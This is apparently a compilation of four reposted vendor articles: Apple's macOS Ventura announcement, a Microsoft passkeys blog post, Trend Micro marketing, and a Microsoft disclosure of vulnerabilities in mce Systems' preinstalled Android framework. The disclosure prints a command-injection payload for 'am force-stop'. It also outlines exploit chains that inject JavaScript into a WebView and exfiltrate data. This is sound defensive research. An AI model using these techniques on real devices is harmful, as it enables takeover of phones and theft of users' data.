A FaceTime call on iPhone 13 Pro with the Handoff option to switch to Mac displayed on MacBook Pro.

Powerful Updates to Key macOS Apps and Features

Safari offers the fastest and most power-efficient browsing experience on the Mac, along with trailblazing privacy features. In macOS Ventura, Safari introduces a powerful new way for users to browse together: With shared Tab Groups, friends, family, and colleagues can share their favorite sites in Safari and see what tabs others are looking at live. Users can also build a list of bookmarks on a shared Start Page, and even start a Messages conversation or FaceTime call right from Safari — great for planning a trip or researching a project together.

A Safari window displaying the new shared Tab Groups feature.

In the biggest overhaul to search in years, Mail now uses state-of-the-art techniques to deliver more relevant, accurate, and complete results. Users can quickly find what they are looking for as soon as they click into search, including recent emails, contacts, documents, photos, and more, all before they even start typing. Users can also schedule emails and even cancel delivery after hitting send,5 and Mail now intelligently detects if items such as an attachment or cc’d recipient is missing from their message. In Mail, users can set reminders to come back to a message at a particular date and time, and receive automatic suggestions to follow up on an email if there has been no response.

The new search results in Mail displayed on MacBook Pro.
The new scheduling feature in Mail displayed on MacBook Pro.
  • previous
  • next

Messages on the Mac now includes the ability to edit or undo a recently sent message, mark a message as unread, or even recover accidentally deleted messages.6 New collaboration features make working with others quick and seamless. Now, when a user shares a file via Messages using the share sheet or drag and drop, they can choose to share a copy or collaborate. When they choose to collaborate, everyone on a Messages thread is automatically added. And when someone makes an edit to the shared document, activity updates appear at the top of the thread. Users can also join SharePlay sessions from their Mac right in Messages, so they can chat and participate in synchronised experiences.

An Apple TV SharePlay session in Messages on MacBook Pro.

Spotlight includes an updated design that makes navigation easier, new features that provide a more consistent experience across Apple devices, and Quick Look for quickly previewing files. Users can now find images in their photo library, across the system, and on the web. They can even search for their photos by location, people, scenes, or objects, and Live Text lets them search by text inside images. To be even more productive, users can now take actions from Spotlight, like starting a timer, creating a new document, or running a shortcut. And Spotlight now includes rich results for artists, movies, actors, and TV shows, as well as businesses and sports.

Spotlight search results across iPad and MacBook Pro.
The new photo search experience in Spotlight on MacBook Pro.
The new search results for a TV show in Spotlight on MacBook Pro.
  • previous
  • next

With iCloud Shared Photo Library, users can now create and share a separate photo library among up to six family members, so everyone can enjoy all of their family photos. Users can choose to share all of their existing photos from their personal libraries, or share based on a start date or people in the photos. To help keep their Shared Library up to date, users will receive intelligent suggestions to share relevant photo moments that include participants in the library and any other people they choose. Every user in the Shared Photo Library can add, delete, edit, or favorite the shared photos and videos, which will appear in each user’s Memories and Featured Photos so that everyone can relive more complete family moments.

More Secure Browsing in Safari

Browsing in Safari is even safer with passkeys, next-generation credentials that are more secure, easy to use, and designed to replace passwords. Passkeys are unique digital keys that stay on device and are never stored on a web server, so hackers can’t leak them or trick users into sharing them. Passkeys make it simple to sign in securely, using Touch ID or Face ID for biometric verification, and iCloud Keychain to sync across Mac, iPhone, iPad, and Apple TV with end-to-end encryption. They will also work across apps and the web, and users can even sign in to websites or apps on non-Apple devices using their iPhone.

The new passkeys sign-in experience on MacBook Pro.

Immersive Gaming Experiences

The power of Apple silicon enables every new Mac to run AAA games with ease, including upcoming titles such as EA’s GRID Legends and Capcom’s Resident Evil Village. And since Apple silicon also powers iPad, game developers can bring their AAA games to even more users, like No Man’s Sky from Hello Games, which is coming to both Mac and iPad later this year. 

Metal 3, the latest version of the software that powers the gaming experience across Apple platforms, introduces new features that take the gaming experience on Mac to new heights and unleash the full potential of Apple silicon for years to come. MetalFX Upscaling enables developers to quickly render complex scenes by using less compute-intensive frames, and then apply resolution scaling and temporal anti-aliasing. The result is accelerated performance that provides gamers with a more responsive feel and graphics that look stunning. Game developers also benefit from a new Fast Resource Loading API that minimizes wait time by providing a more direct path from storage to the GPU, so games can easily access high-quality textures and geometry needed to create expansive worlds for realistic and immersive gameplay.

Pause playback of video: Gaming with Metal 3

Metal 3 brings new features that unleash the full potential of Apple silicon for even greater gaming experiences.

More Great Experiences Coming with macOS Ventura

  • Live Text uses on-device intelligence to recognise text in images across the system, and now adds support for paused video frames, as well as Japanese and Korean text. Users can also now lift the subject away from an image and drop it into another app. And Visual Look Up expands its recognition capabilities to now include animals, birds, insects, statues, and even more landmarks.
  • The Weather and Clock apps, with all the features users know and love from iPhone, have been optimized for Mac.
  • New accessibility tools include Live Captions for all audio content, Type to Speak on calls, Text Checker to support proofreading for VoiceOver users, and more.7
  • System Settings is the new name for System Preferences, and comes with a refreshed and streamlined design that is easier to navigate and instantly familiar to iPhone and iPad users.
  • macOS security gets even stronger with new tools that make the Mac more resistant to attack, including Rapid Security Response that works in between normal updates to easily keep security up to date without a reboot.
MacBook Air, the 24-inch iMac, and the new MacBook Pro.

Availability

The developer beta of macOS Ventura is available to Apple Developer Program members at developer.apple.com starting today. A public beta will be available to Mac users next month at beta.apple.com. macOS Ventura will be available this fall as a free software update. For more information, including compatible Mac models, visit apple.com/in/macos/macos-ventura-preview. Features are subject to change. Some features may not be available in all regions or languages.

Source :
https://www.apple.com/in/newsroom/2022/06/macos-ventura-brings-powerful-productivity-tools-new-continuity-features-to-mac/

Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Howdy folks, 

Happy World Password Day! Today, I’m super excited to share some great news with you: Together, with the FIDO Alliance and other major platforms, Microsoft has announced support for the expansion of a common passwordless standard created by the FIDO Alliance and the World Wide Web consortium. These multi-device FIDO credentials, sometimes referred to as passkeys, represent a monumental step toward a world without passwords. We also have some great updates coming to our passwordless solutions in Azure Active Directory (Azure AD) and Windows that will expand passwordless to more use cases. 

Passwords have never been less adequate for protecting our digital lives. As Vasu Jakkal reported earlier today, there are over 921 password attacks every second. Lots of attackers want your password and will keep trying to steal it from you. It’s better for everyone if we just cut off their supply. 

Replacing passwords with passkeys 

Passkeys are a safer, faster, easier replacement for your password. With passkeys, you can sign in to any supported website or application by simply verifying your face, fingerprint or using a device PIN. Passkeys are fast, phish-resistant, and will be supported across leading devices and platforms. Your biometric information never leaves the device and passkeys can even be synced across devices on the same platform – so you don’t need to enroll each device and you’re protected in case you upgrade or lose your device. You can use Windows Hello today to sign in to any site that supports passkeys, and in the near future, you’ll be able to sign in to your Microsoft account with a passkey from an Apple or Google device.  

We enthusiastically encourage website owners and app developers to join Microsoft, Apple, Google, and the FIDO Alliance to support passkeys and help realize our vision of a truly passwordless world.  

thumbnail image 1 of blog post titled Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Going passwordless 

We’re proud to have been one of the earliest supporters of the FIDO standards, including FIDO2 certification for Windows Hello. We’re thrilled to evolve the FIDO standards ecosystem to support passkeys and that passwordless authentication continues to gain momentum. 

Since we started introducing passwordless sign-in nearly 5 years ago, the number of people across Microsoft services signing in each month without using their password has reached more than 240 million. And in the last six months, over 330,000 people have taken the next step of removing the password from their Microsoft Account. After all, you’re completely safe from password-based attacks if you don’t have one. 

Today, we’re also announcing new capabilities that will make it easier for enterprises to go completely passwordless: 

Passwordless for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure 

Now that remote or hybrid work is the new norm, lots more people are using a remote or virtualized desktop to get their work done. And now, we’ve added passwordless support for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure. This is currently in preview with Windows 11 Insiders, and is on the way for Windows 10 as well.  

Windows Hello for Business Cloud Trust  

Windows Hello for Business Cloud Trust simplifies the deployment experience of Windows Hello for hybrid environments. This new deployment model removes previous requirements for public key infrastructure (PKI) and syncing public keys between Azure AD and on-premises domain controllers. This improvement eliminates delays between users provisioning Windows Hello for Business and being able to authenticate and makes it easier than ever to use Windows Hello for Business for accessing on-premises resources and applications. Cloud Trust is now available in preview for Windows 10 21H2 and Windows 11 21H2. 

Multiple passwordless accounts in Microsoft Authenticator 

When we first introduced passwordless sign-in for Azure AD (work or school accounts), Microsoft Authenticator could only support one passwordless account at a time. Now that limitation has been removed and you can have as many as you want. iOS users will start to see this capability later this month and the feature will be available on Android afterwards.  

thumbnail image 2 captioned Passwordless phone sign in experience in Microsoft Authenticator for Azure AD accounts.Passwordless phone sign in experience in Microsoft Authenticator for Azure AD accounts.

Temporary Access Pass in Azure AD 

Temporary Access Pass in Azure AD, a time-limited passcode, has been a huge hit with enterprises since the public preview, and we’ve been adding more ways to use it as we prepare to release the feature this summer. Lots of customers have told us they want to distribute Temporary Access Passes instead of passwords for setting up new Windows devices. You’ll be able to use a Temporary Access Pass to sign in for the first time, to configure Windows Hello, and to join a device to Azure AD. This update will be available next month. 

thumbnail image 3 captioned End user experience for Temporary Access Pass in Windows 11 onboarding.End user experience for Temporary Access Pass in Windows 11 onboarding.

Customers implementing passwordless today 

We already have several great examples of large Microsoft customers implementing passwordless solutions, including Avanade, who went passwordless with help from Feitian to protect their clients’ data against security breaches. Amedisys, a home healthcare and hospice care provider, went passwordless to keep patient personal information secured. Both organizations are committed to using passwordless authentication not only to strengthen security, but also to make the sign-in experience easier for end users. 

We’d love to hear your feedback, so please leave a comment, check out the documentation, and visit aka.ms/gopasswordless for more information. 

Best regards,  

Alex Simons (Twitter: @Alex_A_Simons

Corporate Vice President of Program Management 

Microsoft Identity Division 

Source :
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/expansion-of-fido-standard-and-new-updates-for-microsoft/ba-p/3290633

Android apps with millions of downloads exposed to high-severity vulnerabilities

Microsoft uncovered high-severity vulnerabilities in a mobile framework owned by mce Systems and used by multiple large mobile service providers in pre-installed Android System apps that potentially exposed users to remote (albeit complex) or local attacks. The vulnerabilities, which affected apps with millions of downloads, have been fixed by all involved parties. Coupled with the extensive system privileges that pre-installed apps have, these vulnerabilities could have been attack vectors for attackers to access system configuration and sensitive information.

As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device. We worked with mce Systems, the developer of the framework, and the affected mobile service providers to solve these issues. We commend the quick and professional resolution from the mce Systems engineering teams, as well as the relevant providers in fixing each of these issues, ensuring that users can continue using such a crucial framework.

Collaboration among security researchers, software vendors, and the security community is important to continuously improve defenses for the larger ecosystem. As the threat and computing landscape continues to evolve, vulnerability discoveries, coordinated response, and other forms of threat intelligence sharing are paramount to protecting customers against present and future threats, regardless of the platform or device they are using.

Uncovering the vulnerabilities

Our research on the framework vulnerabilities began while trying to better understand how a pre-installed System application could affect the overall security of mobile devices. We discovered that the framework, which is used by numerous apps, had a “BROWSABLE” service activity that an attacker could remotely invoke to exploit several vulnerabilities that could allow adversaries to implant a persistent backdoor or take substantial control over the device.

The framework seemed to be designed to offer self-diagnostic mechanisms to identify and resolve issues impacting the Android device, indicating its permissions were inherently broad with access to valuable resources. For example, the framework was authorized to access system resources and perform system-related tasks, like adjusting the device’s audio, camera, power, and storage controls. Moreover, we found that the framework was being used by default system applications to leverage its self-diagnostic capabilities, demonstrating that the affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.

According to mce Systems, some of these vulnerabilities also affected other apps on both Android and iOS devices. Moreover, the vulnerable framework and affiliated apps were found on devices from large international mobile service providers. mce Systems, which offers “Mobile Device Lifecycle and Automation Technologies,” also permitted providers to customize and brand their respective mobile apps and frameworks. Pre-installed frameworks and mobile apps such as mce Systems’ are beneficial to users and providers in areas like simplifying the device activation process, troubleshooting device issues, and optimizing performance. However, their extensive control over the device to deliver these kinds of services could also make them an attractive target for attackers. 

Our analysis further found that the apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers. All of the apps are available on the Google Play Store where they go through Google Play Protect’s automatic safety checks, but these checks previously did not scan for these types of issues. As part of our effort to help ensure broad protection against these issues, we shared our research with Google, and Google Play Protect now identifies these types of vulnerabilities.

We initially discovered the vulnerabilities in September 2021 and shared our findings with mce Systems and affected mobile service providers through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). We worked closely with mce Systems’ security and engineering teams to mitigate these vulnerabilities, which included mce Systems sending an urgent framework update to the impacted providers and releasing fixes for the issues. At the time of publication, there have been no reported signs of these vulnerabilities being exploited in the wild.

The high-severity vulnerabilities, which have a Common Vulnerability Scoring System (CVSS) score of 7.0-8.9, are now identified as CVE-2021-42598CVE-2021-42599CVE-2021-42600, and CVE-2021-42601. We want to thank mce Systems’ engineering teams for collaborating quickly and efficiently in resolving these issues as well as to AT&T for proactively working with Microsoft to ensure customers can safely continue to use the framework.

Several other mobile service providers were found using the vulnerable framework with their respective apps, suggesting that there could be additional providers still undiscovered that may be impacted. The affected providers linked below have made updated app versions available to users before this disclosure, ensuring devices can be protected before these vulnerabilities could be exploited. We encourage these providers’ customers to update to the latest versions of these apps from the Google Play store, which include but are not limited to: com.telus.checkupcom.att.dhcom.fivemobile.myaccountcom.freedom.mlp,uat, and com.ca.bell.contenttransfer.

Additionally, the package com.mce.mceiotraceagent might be installed by several mobile phone repair shops. Mobile users are advised to look for that app name and remove it from their phone, if found.

Analyzing apps that use the mce framework

App manifest and permissions

When analyzing an Android application, the first thing that comes to mind is checking its manifest, maintained under the AndroidManifest.xml file. The manifest describes the application itself and its components, such as the following:

  • Permissions (for example, camera access, internet access, and others)
  • Activities and how they respond to Intents sent to them
  • Content providers
  • Receivers and the kind of content they expect to receive
  • Services

Checking the manifest of an app affiliated with mce Systems’ framework shed light on some of its features and capabilities but did not immediately indicate that any vulnerabilities or security issues were present. Therefore, further research into the app’s functionality was needed by understanding its permissions.

Analysis of the app’s permissions on the mobile device revealed authorizations that could lead to powerful access and capabilities for an attacker. Those permissions included control over the following:

  • Networking: access the internet, modify Wi-Fi state, network state, NFC, and Bluetooth
  • File access: read and write to the external storage
  • Peripherals: access the camera, record audio, get fingerprint information, and get the device’s physical location
  • Private information: read phone numbers, account information, and contacts
  • Management: install apps and modify device settings

With access to these valuable resources, the app could be abused by an attacker to implant a persistent backdoor on the device.

BROWSABLE activities

The “Activities” section of the app’s manifest detailed that the Intent-filter element included activities with a “BROWSABLE” category. While most Intents do not require a category, category strings detail the components that should handle the Intent. In particular, the BROWSABLE category allows the target Activity to be triggered from a web browser to display data referenced by a link, like an image. BROWSABLE activities appeal to attackers as the latter can exploit them via malicious web pages and other Intent-based attacks.

Figure 1:  BROWSABLE Activity with the “mcedigital://” scheme

The Intent-filter element in the manifest dictates how the Activity can be triggered. In the app’s case, the Activity could be triggered by simply clicking a link with the “mcedigital://” scheme. This would start the com.mce.sdk.AppActivity Activity with an Intent with arbitrary data (besides the scheme).

Digging deeper: Reviewing the mce framework’s main functionality

We reviewed the effects of triggering the com.mce.sdk.AppActivity. Also known as appActivity, this Activity refers to the different functionalities provided by the app. AppActivity extends Activity and therefore has an onCreate method, which traditionally handles the creating Intent.

AppActivity

Here’s a brief description of AppActivity:

  1. AppActivity has a member called “webView” and type “JarvisWebView,” a specialized class that extends WebView.
  2. Upon creation, AppActivity has some optional display choices from the Intent (if they exist) and then loads a predefined web page to the WebView. That predefined page can get arbitrary query parameters from the Intent’s data; that is, everything after a “\?” will be added to the web page.

Thus, if a user clicks this:

mcedigital://ignored\?arbitrary_params

The App’s WebView loads the following web page:

file:///android_asset/applications/user/reflow-container-bundled/index.html?arbitrary_params

The app’s index.html web page (which is an asset built into the Android app) loads two JavaScript files:

  • config.js: a nonexistent file
  • bundle.js: contains much of the app’s logic

Since we wanted to understand the interplay between bundle.js (JarvisJSInterface) and the WebView (JarvisWebView), we analyzed both.

JarvisWebView and JarvisJSInterface

The main features of the WebView, JarvisWebView class, are the following:

A JavaScript Interface is a conspicuous target to look for security issues, as it uses a JavaScript Bridge to allow invoking specific methods inside an Android app. In the case of JarvisJSInterface, three methods are exported:

  • init(String): takes a string that will be used as a JavaScript callback method; in our case, it will always be window.AndroidCallback
  • windowClose(): runs a callback registered by the Android app
  • request(String): sends a service request from the JavaScript client to the server (Android app)

The request method is by far the most interesting, as it performs the following:

  1. Interprets the given string as a JSON object
  2. Extracts the following pieces from the JSON object:
    • Context: a random GUID generated by the client, used to link requests and responses
    • Service: the service we are about to call to
    • Command: an integer
    • Data: optional parameters sent to the service call
  3. Invokes the method serviceCall, which finds the registered service, gets the method based on the command number, and eventually invokes that method using Java reflection
Figure 2: Service::callServiceMethod

The serviceCall is a powerful method, as it allows the WebView to invoke “services” freely. But what are these services, exactly?

Services offered by the mce framework

After we examined the services offered by this framework per the app manifest, we then obtained a list of services that practically give the WebView complete control over the device. The most notable services include:

  • Audio: access and manipulate volume levels, as well as play a tone with a given duration and frequency
  • Camera: take a silent snapshot
  • Connectivity: control and obtain valuable information from NFC, Wi-Fi, and Bluetooth
  • Device: includes various device controlling mechanisms like battery drainage, performing a factory reset, and obtaining information on apps, addresses, sensor data, and much more
  • Discovery: set the device to discoverable
  • Location: obtain the location in various modes and set the location state
  • PackageManager: acquire package info and silently install a new app
  • Power: obtain charging state
  • Sensor: acquire sensor data such as barometer data, light data, proximity data, and whether fingerprinting is working
  • Storage: obtain content such as documents, media, images, and videos

These services inherit from a base class named “Service” and implement two methods:

  • setServiceName: for service identification purposes
  • setServiceMethodMap: for setting up the mapping between the command integer and the method name, argument names, and argument types

For example, here is the Camera service setting its methods:

  • Method 0 is “getCameraList” and expects no arguments.
  • Method 1 is “captureStillImageNoPreview” and expects one String argument.
Figure 3: The Camera service setting its methods

Vulnerability findings

Based on our analysis of the mce framework, we discovered several vulnerabilities. It should be noted that while mobile service providers can customize their apps respective to mce framework so as not to be identical, the vulnerabilities we discovered can all be exploited in the same manner—by injecting code into the web view. Nonetheless, as their apps and framework customization use different configurations and versions, not all providers are necessarily vulnerable to all the discovered vulnerabilities.

Outdated command-injection vulnerability (CVE-2021-42599)

We found a command-injection vulnerability, tracked as CVE-2021-42599, in the Device service mentioned in the previous section. This service offers rich functionality, including the capability to stop activities of a given package. The client fully controls the argument “value,” and simply runs the following command:

am force-stop "value"

Since the argument is not sanitized, an attacker could add backticks or quotation marks to run arbitrary code, like the following:

am force-stop "a"; command-to-run; echo "a"
Figure 4: Command injection proof-of-concept (POC) exploit code implemented in the Device service

According to mce Systems, they have since removed the functionality behind this vulnerability and it is no longer present in more advanced framework versions.

Exploitation by JavaScript injection with PiTM in certain apps

The services offered by the mce framework further indicated that the following vulnerability resided in the logic of the JavaScript client for apps that are configured to enable plaintext communications such as the app that we initially analyzed. Interestingly, the code for the client is a heavily-obfuscated dynamic JavaScript code that is implemented over several files, mainly bundle.js. Due to the blind trust between the JavaScript client and the JarvisJSInterface server, an attacker who could inject JavaScript contents into the WebView would inherit the permissions that the app already has.

We conceived two injection strategies most likely to be leveraged by attackers:

  1. Affect the JavaScript client behavior by supplying specific GET parameters from the BROWSABLE Intent.
  2. Trigger an app with the BROWSABLE Intent to become a person-in-the-middle (PiTM) and view the device’s entire traffic. Inject JavaScript code if the client ever tries to fetch external content and interpret it as a script or HTML.

Once we reverse-engineered the client’s obfuscated code, we discovered that it could not inject JavaScript from the GET parameters. The only capability permitted was to affect some of the client’s self-tests upon initialization, such as a battery-draining test or a Wi-Fi connectivity test. However, the WebView-fetched plaintext pages that we discovered could be injected into with a PiTM attack.

Our proof-of-concept (POC) exploit code was therefore:

  1. Perform a PiTM for the target device and lure the user into clicking a link with the “mcesystems://” schema.
  2. Inject JavaScript into one of the plaintext page responses that does the following:
    • Hijack the JavaScript interface by calling init with our callback method
    • Use the JavaScript interface request method to get servicing
    • Send the data to our server for information gathering using XHR (XMLHttpRequest)
Figure 5: Injecting a similar JavaScript code to the WebView could allow an attacker to call arbitrary services and methods

Local elevation of privilege with deserialization followed by injection (CVE-2021-42601)  

Some of the apps we analyzed did not pull plaintext pages. Thus, we looked for a local elevation of privilege vulnerability, allowing a malicious app to gain the system apps’ privileges, tracked as CVE-2021-42601.

In the apps mentioned above, we discovered that the main Activity attempted to handle a deep link (a link that launches an app instead of a browser on click) with Google Firebase. Interestingly, this deep-link handling tried to deserialize a structure called PendingDynamicLinkData (representing a link) from an Intent Extra byte array with the key com.google.firebase.dynamiclinks.DYNAMIC_LINK_DATA. This structure was used later by the mce framework to generate various JSON Objects that might contain data from a categoryId query parameter in the original link, and eventually ended up in the member mFlowSDKInput to be injected into the JarvisWebView instance in an unsafe way:

Figure 6: Unsanitized JavaScript loading allowed arbitrary code injection to the WebView

Since the categoryId query parameter might contain apostrophes, one could inject arbitrary JavaScript code into the WebView. We decided to inject a code that would reach out to a server and load a second-stage code, which was the exact one we used for our PiTM scenario.

Figure 7: Local injection POC exploit

Software design against JavaScript injection vulnerabilities

We worked closely with the mce Systems engineering team and discovered that the reason for unsafe loadUrl invocations with JavaScript injections was that the framework used an asynchronous model of operation. When the JavaScript client performs a request, it expects to be notified later when there are results. Since Android JavaScript Bridge only allows primitive types to be sent (for example, Strings), the mce framework notified the JavaScript client by injecting JavaScript with potentially unsafe arguments (the results themselves).

We offered mce Systems a slightly different software design that prevents unsafe JavaScript injection. The description of the flow of information in our proposal is as follows:

  1. The JavaScript client invokes the request method on the Android JavaScript Bridge, supplying the request itself along with a request ID.
  2. The Java server performs the request and stores the result in a cache. The said cache then maps request IDs to results.
  3. The Java server notifies the client by carefully injecting the JavaScript loadUrl(“javascript:window.onMceResult(<requestID>);”) into the WebView. Note that the only non-constant string is the request ID, which can easily be sanitized. This method “wakes the client up”
  4. The JavaScript client implementation of onMceResult invokes the Android JavaScript Bridge with the method String fetchResult(String requestId). Note that this method returns a string (which contains the result).

This way, the JavaScript client does not need to poll for asynchronous results while data is safely transferred between the client and the server.

Interestingly, Google AndroidX offers a very similar API: webMessageListener. While the said API works quite similarly to our suggestion, it only supports Android versions greater than Lollipop. Thus, the new mce framework now checks the Android version and uses this new Google API if supported or our offered solution for older devices.

The above is just one example of our collaboration to help secure our cross-platform ecosystem. According to mce Systems, all of our reported vulnerabilities were addressed.

Improving security for all through threat intelligence sharing and research-driven protections

Microsoft strives to continuously improve security by collaborating with customers, partners, and industry experts. Responding to the evolving threat landscape requires us to expand our capabilities into other devices and non-Windows platforms in addition to further coordinating research and threat intelligence sharing among the larger security community. This case highlighted the need for expert, cross-industry collaboration to effectively mitigate issues.

Moreover, collaborative research such as this informs our seamless protection capabilities across platforms. For example, intelligence from this analysis helped us ensure that Microsoft Defender Vulnerability Management can identify and remediate devices that have these vulnerabilities, providing security operations teams with comprehensive visibility into their organizational exposure and enabling them to reduce the attack surface. In addition, while we’re not aware of any active exploitation of these mobile vulnerabilities in the wild, Microsoft Defender for Endpoint’s mobile threat defense capabilities significantly improve security on mobile devices by detecting potential exploits, malware, and post-exploitation activity.

We will continue to work with the security community to share intelligence about threats and build better protection for all. Microsoft security researchers continually work to discover new vulnerabilities and threats, turning a variety of wide-reaching issues into tangible results and improved solutions that protect users and organizations across platforms every single day. Similarly inquisitive individuals are encouraged to check opportunities to join the Microsoft research team here: https://careers.microsoft.com/.  

Jonathan Bar Or, Sang Shin Jung, Michael Peck, Joe Mansour, and Apurva Kumar
Microsoft 365 Defender Research Team

Source :
https://www.microsoft.com/security/blog/2022/05/27/android-apps-with-millions-of-downloads-exposed-to-high-severity-vulnerabilities/

Trend Micro’s One Vision, One Platform

The world moves fast sometimes. Just two years ago, organizations were talking vaguely about the need to transform digitally, and ransomware began to make headlines outside the IT media circle. Fast forward to 2022, and threat actors have held oil pipelines and critical food supply chains hostage, while many organizations have passed a digital tipping point that will leave them forever changed. Against this backdrop, CISOs are increasingly aware of running disjointed point products’ cost, operational, and risk implications.

That’s why Trend Micro is transforming from a product- to a platform-centric company. From the endpoint to the cloud, we’re focused on helping our customers prepare for, withstand, and rapidly recover from threats—freeing them to go further and do more. Analysts seem to agree.

Unprecedented change

The digital transformation that organizations underwent during the pandemic was, in some cases, unprecedented. It helped them adapt to a new reality of remote and now hybrid working, supply chain disruption, and rising customer expectations. The challenge is that these investments in cloud infrastructure and services are broadening the corporate attack surface. In many cases, in-house teams are drowning in new attack techniques and cloud provider features. This can lead to misconfigurations which open the door to hackers.

Yet even without human error, there’s plenty for the bad guys to target in modern IT environments—from unpatched vulnerabilities to accounts protected with easy-to-guess or previously breached passwords. That means threat prevention isn’t always possible. Instead, organizations are increasingly looking to augment these capabilities with detection and response tooling like XDR to ensure incidents don’t turn into large-scale breaches. It’s important that these tools are able to prioritize alerts. Trend Micro found that as many as 70% of security operations (SecOps) teams are emotionally overwhelmed with the sheer volume of alerts they’re forced to deal with.

SecOps staff and their colleagues across the IT function are stretched to the limit by these trends, which are compounded by industry skills shortages. The last thing they need is to have to swivel-chair between multiple products to find the right information.

What Gartner says

Analyst firm Gartner is observing the same broad industry trends. In a recent report, it claimed that:

  • Vendors are increasingly divided into “platform” and “portfolio” providers—the latter providing products with little underlying integration
  • By 2025, 70% of organizations will reduce to a maximum of three the number of vendors they use to secure cloud-native applications
  • By 2027, half of the mid-market security buyers will use XDR to help consolidate security technologies such as endpoint, cloud, and identity
  • Vendors are increasingly integrating diverse security capabilities into a single platform. Those which minimize the number of consoles and configuration planes, and reuse components and information, will generate the biggest benefits

The power of one

This is music to our ears. It is why Trend Micro introduces a unified cybersecurity platform, delivering protection across the endpoint, network, email, IoT, and cloud, all tied together with threat detection and response from our Vision One platform. These capabilities will help customers optimize protection, detection, and response, leveraging automation across the key layers of their IT environment in a way that leaves no coverage gaps for the bad guys to hide in.

There are fewer overheads and hands-on decisions for stretched security teams with fewer vendors to manage, a high degree of automation, and better alert prioritization. Trend Micro’s unified cybersecurity platform vision also includes Trend Micro Service One for 24/7/365 managed detection, response, and support—to augment in-house skills and let teams focus on higher-value tasks.

According to Gartner, the growth in market demand for platform-based offerings has led some vendors to bundle products as a portfolio despite no underlying synergy. This can be a “worst of all worlds,” as products are neither best-of-breed nor do they reduce complexity and overheads, it claims.

We agree. That’s why Trend Micro offers a fundamentally more coherent platform approach. We help organizations continuously discover an ever-changing attack surface, assess risks and then take streamlined steps to mitigate that risk—applying the right security at the right time. That’s one vision, one platform, and total protection.

To find out more about Trend Micro One, please visit: https://www.trendmicro.com/platform-one

Source :
https://www.trendmicro.com/en_us/research/22/e/platform-centric-enterprise-cybersecurity-protection.html